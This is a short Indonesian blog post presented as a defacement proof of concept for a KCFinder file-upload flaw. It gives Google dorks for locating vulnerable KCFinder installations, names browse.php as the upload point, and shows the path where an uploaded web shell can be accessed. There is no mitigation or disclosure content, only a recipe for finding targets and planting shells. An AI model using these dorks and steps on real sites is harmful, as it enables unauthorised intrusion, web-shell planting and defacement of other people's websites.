Deface Poc Vulnerability Kcfinder Files Upload

Welcome back, mumpung gw lagi gabut, gw share kerentanan lagi nih, proof of concept kcfinder. Sebelumnya ada yg tau kerentaan dari kcfinder?, kerentaan nya karena adanya bug di web yg mengijinkan sang attacker mengunggah file dari plugin kcfinder, jadi hampir mirip ya sama kerentaan rfm.

Dork: inurl:/kcfinder/browse.php
           inurl:/assets/kcfinder/browse.php

           inurl:/panel/kcfinder/ site:etc

           inurl:kcfinder intext:browse.php

Exploit: browse.php

Access Your Shell: site/kcfinder/upload/files/yourshell.php

Share this post

Berlangganan update artikel terbaru via email: